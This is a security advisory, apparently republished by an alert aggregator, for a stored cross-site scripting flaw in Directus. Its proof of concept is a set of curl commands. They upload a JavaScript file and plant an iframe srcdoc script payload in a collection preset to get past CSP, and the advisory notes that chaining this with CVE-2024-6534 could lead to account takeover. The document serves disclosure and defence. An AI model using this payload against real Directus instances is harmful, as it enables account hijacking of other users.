GHSA-9qrm-48qf-r2rw: XSS

First published: Thu Jan 23 2025(Updated: )

### Impact Directus allows an authenticated attacker to save cross site scripting code to the database. This is possible because the application injects an attacker-controlled parameter that will be stored in the server and used by the client into an unsanitized DOM element. When chained with [CVE-2024-6534](https://github.com/directus/directus/security/advisories/GHSA-3fff-gqw3-vj86), it could result in account takeover. ### PoC To exploit this vulnerability, we need to do the following steps using a non-administrative, default role attacker account. 1. Upload the following JavaScript file. Using the upload functionality at `POST /files`. This PoC will show an alert message. ```js export TARGET_HOST="http://localhost:8055" export ATTACKER_EMAIL="malicious@malicious.com" export ATTACKER_PASSWORD="123456" root_dir=$(dirname $0) mkdir "${root_dir}/static" curl -s -k -o /dev/null -w "%{http_code}" -X 'POST' "${TARGET_HOST}/auth/login" \ -c "${root_dir}/static/attacker_directus_session_token" \ -H 'Content-Type: application/json' \ -d "{\"email\":\"${ATTACKER_EMAIL}\",\"password\":\"${ATTACKER_PASSWORD}\",\"mode\":\"session\"}" id_url_file=$(echo "alert('Successful DOM-based XSS')" | curl -s -k -X 'POST' "${TARGET_HOST}/files" \ -b "${root_dir}/static/attacker_directus_session_token" \ -F "file=@-;type=application/x-javascript;filename=poc.js" | jq -r ".data.id") ``` 2. Create a preset for a collection and store the preset ID. Or use a preset already created from GET /presets. The following example uses the direct_users preset. ``` attacker_user_id=$(curl -s -k "${TARGET_HOST}/users/me" \ -b "${root_dir}/static/attacker_directus_session_token" | jq -r ".data.id") curl -i -s -k -X 'POST' "${TARGET_HOST}/presets" \ -H 'Content-Type: application/json' \ -b "${root_dir}/static/attacker_directus_session_token" \ --data-binary "{\"layout\":\"cards\",\"bookmark\":null,\"role\":null,\"user\":\"${attacker_user_id}\",\"search\":null,\"filter\":null,\"layout_query\":{\"cards\":{\"sort\":[\"email\"]}},\"layout_options\":{\"cards\":{\"icon\":\"account_circle\",\"title\":\"<iframe srcdoc=\\\"<script src='http://localhost:8055/assets/${id_url_file}'> </script>\\\">\",\"subtitle\":\"{{ email }}\",\"size\":4}},\"refresh_interval\":null,\"icon\":\"bookmark\",\"color\":null,\"collection\":\"directus_users\"}" ``` When the user visits the view that uses the directus_users preset, the JavaScript file will be executed. Notes: Need to use an iframe to execute the malicious JavaScript file to bypass the CSP policies. The payload structure is `<iframe srcdoc=\"<script src='URL_MALICIOUS_FILE'> </script>\">`. We can target any collection that uses the vulnerable template structure that renders the layout option section. In this PoC, the target is the same user who sends the payload, but if the attacking user has permission to modify or create presets for other users or even if he does not have permissions but can chain with CVE-2024-6534, he can achieve an account takeover.

Never miss a vulnerability like this again

Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.

Read MoreStart Free Trial

• collector/github-advisory-latest
• source/GitHub
• alias/GHSA-9qrm-48qf-r2rw
• agent/software-canonical-lookup
• agent/last-modified-date
• agent/weakness
• agent/source
• agent/references
• agent/severity
• agent/tags
• agent/softwarecombine
• agent/first-publish-date
• agent/type
• agent/description
• agent/event
• package-manager/npm